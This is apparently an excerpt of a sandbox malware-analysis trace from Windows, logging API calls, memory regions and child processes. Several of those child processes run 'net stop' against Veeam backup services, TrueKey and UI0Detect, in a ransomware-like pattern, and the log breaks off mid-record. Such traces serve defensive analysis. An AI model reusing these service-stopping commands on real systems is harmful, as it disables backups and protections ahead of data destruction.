GetFileType (hFile=0xb) returned 0x2 [0117.578] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f9a8 | out: lpMode=0x24f9a8) returned 1 [0117.579] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe15b50*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0x24f9a0, lpReserved=0x0 | out: lpBuffer=0xffe15b50*, lpNumberOfCharsWritten=0x24f9a0*=0x3c) returned 1 [0117.579] GetFileType (hFile=0xb) returned 0x2 [0117.579] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f9a8 | out: lpMode=0x24f9a8) returned 1 [0117.579] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f9a0, lpReserved=0x0 | out: lpBuffer=0xffdf1efc*, lpNumberOfCharsWritten=0x24f9a0*=0x2) returned 1 [0117.580] _ultow (in: _Dest=0xdc1, _Radix=2423312 | out: _Dest=0xdc1) returned="3521" [0117.580] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffe15b50, nSize=0x800, Arguments=0xffe17f90 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0117.580] GetFileType (hFile=0xb) returned 0x2 [0117.580] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f9a8 | out: lpMode=0x24f9a8) returned 1 [0117.580] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe15b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24f9a0, lpReserved=0x0 | out: lpBuffer=0xffe15b50*, lpNumberOfCharsWritten=0x24f9a0*=0x34) returned 1 [0117.581] GetFileType (hFile=0xb) returned 0x2 [0117.581] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24f9a8 | out: lpMode=0x24f9a8) returned 1 [0117.581] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f9a0, lpReserved=0x0 | out: lpBuffer=0xffdf1efc*, lpNumberOfCharsWritten=0x24f9a0*=0x2) returned 1 [0117.581] NetApiBufferFree (Buffer=0x344d50) returned 0x0 [0117.582] NetApiBufferFree (Buffer=0x34c0f0) returned 0x0 [0117.582] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop UI0Detect /y" [0117.582] exit (_Code=2) Process: id = "335" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6cc9d000" os_pid = "0x9b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "330" os_parent_pid = "0xc6c" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamBackupSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11812 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11813 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 11814 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 11815 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 11816 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11817 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11818 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11819 start_va = 0xffdf0000 end_va = 0xffe22fff entry_point = 0xffdf0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11820 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11821 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11822 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 11823 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11824 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11825 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11826 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 11827 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11828 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11829 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11830 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11850 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11851 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 11852 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 11853 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11854 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11855 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11856 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11857 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11858 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11859 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11860 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11861 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11862 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11863 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11864 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11865 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11866 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11867 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11868 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11869 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 858 os_tid = 0x49c [0117.513] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xafdd0 | out: lpSystemTimeAsFileTime=0xafdd0*(dwLowDateTime=0xfb2e5450, dwHighDateTime=0x1d48689)) [0117.513] GetCurrentProcessId () returned 0x9b4 [0117.513] GetCurrentThreadId () returned 0x49c [0117.513] GetTickCount () returned 0x270bc [0117.513] QueryPerformanceCounter (in: lpPerformanceCount=0xafdd8 | out: lpPerformanceCount=0xafdd8*=1816443100000) returned 1 [0117.514] GetModuleHandleW (lpModuleName=0x0) returned 0xffdf0000 [0117.539] __set_app_type (_Type=0x1) [0117.539] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe09c9c) returned 0x0 [0117.539] __getmainargs (in: _Argc=0xffe14780, _Argv=0xffe14790, _Env=0xffe14788, _DoWildCard=0, _StartInfo=0xffe1479c | out: _Argc=0xffe14780, _Argv=0xffe14790, _Env=0xffe14788) returned 0 [0117.539] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.539] GetConsoleOutputCP () returned 0x1b5 [0117.539] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffe1cec0 | out: lpCPInfo=0xffe1cec0) returned 1 [0117.540] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0117.542] sprintf_s (in: _DstBuf=0xafd78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0117.542] setlocale (category=0, locale=".437") returned="English_United States.437" [0117.543] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.543] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0117.543] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamBackupSvc /y" [0117.543] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xafb10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0117.543] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0117.543] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xafd68 | out: Buffer=0xafd68*=0x1d4d50) returned 0x0 [0117.543] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xafd68 | out: Buffer=0xafd68*=0x1dc100) returned 0x0 [0117.543] _fileno (_File=0x7fefdba2a80) returned 0 [0117.543] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0117.544] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0117.544] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0117.544] _wcsicmp (_String1="config", _String2="stop") returned -16 [0117.544] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0117.544] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0117.544] _wcsicmp (_String1="file", _String2="stop") returned -13 [0117.544] _wcsicmp (_String1="files", _String2="stop") returned -13 [0117.544] _wcsicmp (_String1="group", _String2="stop") returned -12 [0117.544] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0117.544] _wcsicmp (_String1="help", _String2="stop") returned -11 [0117.544] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0117.544] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0117.544] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0117.544] _wcsicmp (_String1="session", _String2="stop") returned -15 [0117.544] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0117.544] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0117.544] _wcsicmp (_String1="share", _String2="stop") returned -12 [0117.544] _wcsicmp (_String1="start", _String2="stop") returned -14 [0117.544] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0117.544] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0117.544] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0117.544] _wcsicmp (_String1="accounts", _String2="VeeamBackupSvc") returned -21 [0117.544] _wcsicmp (_String1="computer", _String2="VeeamBackupSvc") returned -19 [0117.544] _wcsicmp (_String1="config", _String2="VeeamBackupSvc") returned -19 [0117.544] _wcsicmp (_String1="continue", _String2="VeeamBackupSvc") returned -19 [0117.544] _wcsicmp (_String1="cont", _String2="VeeamBackupSvc") returned -19 [0117.544] _wcsicmp (_String1="file", _String2="VeeamBackupSvc") returned -16 [0117.544] _wcsicmp (_String1="files", _String2="VeeamBackupSvc") returned -16 [0117.544] _wcsicmp (_String1="group", _String2="VeeamBackupSvc") returned -15 [0117.544] _wcsicmp (_String1="groups", _String2="VeeamBackupSvc") returned -15 [0117.544] _wcsicmp (_String1="help", _String2="VeeamBackupSvc") returned -14 [0117.544] _wcsicmp (_String1="helpmsg", _String2="VeeamBackupSvc") returned -14 [0117.544] _wcsicmp (_String1="localgroup", _String2="VeeamBackupSvc") returned -10 [0117.544] _wcsicmp (_String1="pause", _String2="VeeamBackupSvc") returned -6 [0117.544] _wcsicmp (_String1="session", _String2="VeeamBackupSvc") returned -3 [0117.544] _wcsicmp (_String1="sessions", _String2="VeeamBackupSvc") returned -3 [0117.544] _wcsicmp (_String1="sess", _String2="VeeamBackupSvc") returned -3 [0117.544] _wcsicmp (_String1="share", _String2="VeeamBackupSvc") returned -3 [0117.545] _wcsicmp (_String1="start", _String2="VeeamBackupSvc") returned -3 [0117.545] _wcsicmp (_String1="stats", _String2="VeeamBackupSvc") returned -3 [0117.545] _wcsicmp (_String1="statistics", _String2="VeeamBackupSvc") returned -3 [0117.545] _wcsicmp (_String1="stop", _String2="VeeamBackupSvc") returned -3 [0117.545] _wcsicmp (_String1="time", _String2="VeeamBackupSvc") returned -2 [0117.545] _wcsicmp (_String1="user", _String2="VeeamBackupSvc") returned -1 [0117.545] _wcsicmp (_String1="users", _String2="VeeamBackupSvc") returned -1 [0117.545] _wcsicmp (_String1="msg", _String2="VeeamBackupSvc") returned -9 [0117.545] _wcsicmp (_String1="messenger", _String2="VeeamBackupSvc") returned -9 [0117.545] _wcsicmp (_String1="receiver", _String2="VeeamBackupSvc") returned -4 [0117.545] _wcsicmp (_String1="rcv", _String2="VeeamBackupSvc") returned -4 [0117.545] _wcsicmp (_String1="netpopup", _String2="VeeamBackupSvc") returned -8 [0117.545] _wcsicmp (_String1="redirector", _String2="VeeamBackupSvc") returned -4 [0117.545] _wcsicmp (_String1="redir", _String2="VeeamBackupSvc") returned -4 [0117.545] _wcsicmp (_String1="rdr", _String2="VeeamBackupSvc") returned -4 [0117.545] _wcsicmp (_String1="workstation", _String2="VeeamBackupSvc") returned 1 [0117.545] _wcsicmp (_String1="work", _String2="VeeamBackupSvc") returned 1 [0117.545] _wcsicmp (_String1="wksta", _String2="VeeamBackupSvc") returned 1 [0117.545] _wcsicmp (_String1="prdr", _String2="VeeamBackupSvc") returned -6 [0117.545] _wcsicmp (_String1="devrdr", _String2="VeeamBackupSvc") returned -18 [0117.545] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamBackupSvc") returned -10 [0117.545] _wcsicmp (_String1="server", _String2="VeeamBackupSvc") returned -3 [0117.545] _wcsicmp (_String1="svr", _String2="VeeamBackupSvc") returned -3 [0117.545] _wcsicmp (_String1="srv", _String2="VeeamBackupSvc") returned -3 [0117.545] _wcsicmp (_String1="lanmanserver", _String2="VeeamBackupSvc") returned -10 [0117.545] _wcsicmp (_String1="alerter", _String2="VeeamBackupSvc") returned -21 [0117.545] _wcsicmp (_String1="netlogon", _String2="VeeamBackupSvc") returned -8 [0117.545] _wcsupr (in: _String="VeeamBackupSvc" | out: _String="VEEAMBACKUPSVC") returned="VEEAMBACKUPSVC" [0117.545] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1dce10 [0117.549] GetServiceKeyNameW (in: hSCManager=0x1dce10, lpDisplayName="VEEAMBACKUPSVC", lpServiceName=0xffe15750, lpcchBuffer=0xafc88 | out: lpServiceName="", lpcchBuffer=0xafc88) returned 0 [0117.550] _wcsicmp (_String1="msg", _String2="VEEAMBACKUPSVC") returned -9 [0117.550] _wcsicmp (_String1="messenger", _String2="VEEAMBACKUPSVC") returned -9 [0117.550] _wcsicmp (_String1="receiver", _String2="VEEAMBACKUPSVC") returned -4 [0117.550] _wcsicmp (_String1="rcv", _String2="VEEAMBACKUPSVC") returned -4 [0117.550] _wcsicmp (_String1="redirector", _String2="VEEAMBACKUPSVC") returned -4 [0117.550] _wcsicmp (_String1="redir", _String2="VEEAMBACKUPSVC") returned -4 [0117.550] _wcsicmp (_String1="rdr", _String2="VEEAMBACKUPSVC") returned -4 [0117.550] _wcsicmp (_String1="workstation", _String2="VEEAMBACKUPSVC") returned 1 [0117.550] _wcsicmp (_String1="work", _String2="VEEAMBACKUPSVC") returned 1 [0117.550] _wcsicmp (_String1="wksta", _String2="VEEAMBACKUPSVC") returned 1 [0117.550] _wcsicmp (_String1="prdr", _String2="VEEAMBACKUPSVC") returned -6 [0117.550] _wcsicmp (_String1="devrdr", _String2="VEEAMBACKUPSVC") returned -18 [0117.550] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMBACKUPSVC") returned -10 [0117.550] _wcsicmp (_String1="server", _String2="VEEAMBACKUPSVC") returned -3 [0117.550] _wcsicmp (_String1="svr", _String2="VEEAMBACKUPSVC") returned -3 [0117.551] _wcsicmp (_String1="srv", _String2="VEEAMBACKUPSVC") returned -3 [0117.551] _wcsicmp (_String1="lanmanserver", _String2="VEEAMBACKUPSVC") returned -10 [0117.551] _wcsicmp (_String1="alerter", _String2="VEEAMBACKUPSVC") returned -21 [0117.551] _wcsicmp (_String1="netlogon", _String2="VEEAMBACKUPSVC") returned -8 [0117.551] NetServiceControl (in: servername=0x0, service="VEEAMBACKUPSVC", opcode=0x0, arg=0x0, bufptr=0xafc90 | out: bufptr=0xafc90) returned 0x889 [0117.551] wcscpy_s (in: _Destination=0xffe180d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0117.551] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0117.558] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffe15b50, nSize=0x800, Arguments=0xffe17f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0117.560] GetFileType (hFile=0xb) returned 0x2 [0117.560] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xafb58 | out: lpMode=0xafb58) returned 1 [0117.560] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe15b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xafb50, lpReserved=0x0 | out: lpBuffer=0xffe15b50*, lpNumberOfCharsWritten=0xafb50*=0x1e) returned 1 [0117.561] GetFileType (hFile=0xb) returned 0x2 [0117.561] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xafb58 | out: lpMode=0xafb58) returned 1 [0117.561] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xafb50, lpReserved=0x0 | out: lpBuffer=0xffdf1efc*, lpNumberOfCharsWritten=0xafb50*=0x2) returned 1 [0117.562] _ultow (in: _Dest=0x889, _Radix=719808 | out: _Dest=0x889) returned="2185" [0117.562] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffe15b50, nSize=0x800, Arguments=0xffe17f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0117.562] GetFileType (hFile=0xb) returned 0x2 [0117.562] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xafb58 | out: lpMode=0xafb58) returned 1 [0117.563] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe15b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xafb50, lpReserved=0x0 | out: lpBuffer=0xffe15b50*, lpNumberOfCharsWritten=0xafb50*=0x34) returned 1 [0117.563] GetFileType (hFile=0xb) returned 0x2 [0117.563] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xafb58 | out: lpMode=0xafb58) returned 1 [0117.563] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xafb50, lpReserved=0x0 | out: lpBuffer=0xffdf1efc*, lpNumberOfCharsWritten=0xafb50*=0x2) returned 1 [0117.564] NetApiBufferFree (Buffer=0x1d4d50) returned 0x0 [0117.564] NetApiBufferFree (Buffer=0x1dc100) returned 0x0 [0117.564] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamBackupSvc /y" [0117.564] exit (_Code=2) Process: id = "336" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6718d000" os_pid = "0xc5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop VeeamCatalogSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11871 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11872 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11873 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11874 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 11875 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11876 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11877 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11878 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 11879 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11880 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11881 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 11882 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11883 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11884 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11885 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 11886 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11887 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11888 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11889 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 860 os_tid = 0xc58 Process: id = "337" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x51634000" os_pid = "0xb04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "322" os_parent_pid = "0x1e0" cmd_line = "C:\\Windows\\system32\\net1 stop TrueKey /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11890 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11891 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11892 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11893 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 11894 start_va = 